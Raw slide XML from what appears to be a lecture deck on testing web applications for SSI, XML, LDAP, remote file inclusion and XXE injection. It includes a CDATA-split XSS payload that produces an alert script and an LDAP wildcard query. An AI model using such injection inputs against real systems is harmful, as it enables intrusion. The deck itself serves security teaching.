              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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45</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2916283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Unfortunately, the use of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>shtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> extension is not mandatory, so not having found any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>shtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> files doesn't necessarily mean that the target is not prone to SSI injection attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>we need to find every page where the user is allowed to submit some kind of input, and verify whether the application is correctly validating the submitted input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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46</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1721546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first step in order to test an application for the presence of a XML Injection vulnerability consists of trying to insert XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>metacharacters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When not sanitized, this character could throw an exception during XML parsing, if the injected value is going to be part of an attribute value in a tag.</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6</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="280918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is well formed and valid, and represents the '&lt;' ASCII character.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>If '&amp;' is not encoded itself with &amp;amp;, it could be used to test XML injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>In fact, if an input like the following is provided:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>but, again, the document is not valid: &amp;foo is not terminated with ';' and the &amp;foo; entity is undefined.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:b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8</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175276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CDATA sections are used to escape blocks of text containing characters which would otherwise be recognized as markup. In other words, characters enclosed in a CDATA section are not parsed by an XML parser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>so that '&lt;foo&gt;' won't be parsed as markup and will be considered as character data.</a:t>
            </a:r>
          </a:p>
          <a:p>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9</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3926984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Another test is related to CDATA tag. Suppose that the XML document is processed to generate an HTML page. In this case, the CDATA section delimiters may be simply eliminated, without further inspecting their contents. Then, it is possible to inject HTML tags, which will be included in the generated page, completely bypassing existing sanitization routines.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During the processing, the CDATA section delimiters are eliminated, generating the following HTML code:</a:t>
            </a:r>
          </a:p>
          <a:p>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10</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="748577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original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> node has been commented out, leaving only the injected one. The document now complies with its DTD rules.</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17</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1762334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vulnerability occurs due to the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>user-supplied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input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> without proper validation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing external URL to be injected. Although most examples point to vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>PHP scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, we should keep in mind that it is also common in other technologies such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>JSP, ASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>and others.</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18</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299718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In this example the path is extracted from the HTTP request and no input validation is done (for example, by checking the input against a white list), so this snippet of code results vulnerable to this type of attack. Consider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>infact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> the following URL:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto numero diapositiva 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80561EBF-21F8-468E-8D77-03247B7DE346}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="338069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D074699F-05BD-47D2-A710-7657302FDBE4}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>27/11/2019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30303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074699F-05BD-47D2-A710-7657302FDBE4}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>27/11/2019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308191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074699F-05BD-47D2-A710-7657302FDBE4}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>27/11/2019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376645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074699F-05BD-47D2-A710-7657302FDBE4}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>27/11/2019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230942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D074699F-05BD-47D2-A710-7657302FDBE4}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>27/11/2019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248018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D074699F-05BD-47D2-A710-7657302FDBE4}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>27/11/2019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361597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D074699F-05BD-47D2-A710-7657302FDBE4}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>27/11/2019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36546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D074699F-05BD-47D2-A710-7657302FDBE4}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>27/11/2019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5691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074699F-05BD-47D2-A710-7657302FDBE4}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>27/11/2019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394191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74699F-05BD-47D2-A710-7657302FDBE4}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>27/11/2019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236563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74699F-05BD-47D2-A710-7657302FDBE4}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>27/11/2019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20365AF-22A5-47B4-AFAA-7FD195BFC411}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="338524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4699F-05BD-47D2-A710-7657302FDBE4}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>27/11/2019</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365AF-22A5-47B4-AFAA-7FD195BFC411}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="571747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example.com/ldapsearch?user=Joh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example.com/ldapsearch?user=*"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XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Injection</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254744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it-IT" sz="2400" b="1" dirty="0"/>
              <a:t>&lt;html&gt; $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>HTMLCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0"/>
              <a:t> &lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>HTMLCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0"/>
              <a:t> = &lt;![CDATA[&lt;]]&gt;script&lt;![CDATA[&gt;]]&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0"/>
              <a:t>')&lt;![CDATA[&lt;]]&gt;/script&lt;![CDATA[&gt;]]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0"/>
              <a:t>&lt;html&gt; &lt;![CDATA[&lt;]]&gt;script&lt;![CDATA[&gt;]]&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0"/>
              <a:t>')&lt;![CDATA[&lt;]]&gt;/script&lt;![CDATA[&gt;]]&gt; &lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0"/>
              <a:t>('XSS')&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Freccia a destra 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-108520" y="202085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51229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5232D-58F3-4881-A422-CB1588DF4F15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>External</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Entities</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{531A6497-C16F-408D-B124-DE96636569DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By default, many older XML processors allow specification of an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>external entity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, a URI that is dereferenced and evaluated during XML processing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tools can discover this issue by inspecting dependencies and configuration. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tools require additional manual steps to detect and exploit this issue. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manual testers need to be trained in how to test for XXE, as it not commonly tested as of 2017. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230986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B25473-9B10-424A-9C0A-DE1405931C61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>External</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Entities</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9755619-18BF-462E-955D-C62BA999E426}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These flaws can be used to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>extract data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, execute a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>remote request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>from the server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scan internal systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, perform a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>denial-of-service attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, as well as execute other attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143089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9031E0-60B6-4D77-986E-787D8EB2C6A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>External</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Entities</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A83ED9EB-3BCF-4A7D-B638-CBB867824D89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> The application accepts XML directly or XML uploads, especially from untrusted sources, or inserts untrusted data into XML documents, which is then parsed by an XML processor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any of the XML processors in the application or SOAP based web services has document type definitions (DTDs) enabled. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the application uses SAML for identity processing within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>federated security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>single sign on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(SSO) purposes. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SAML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
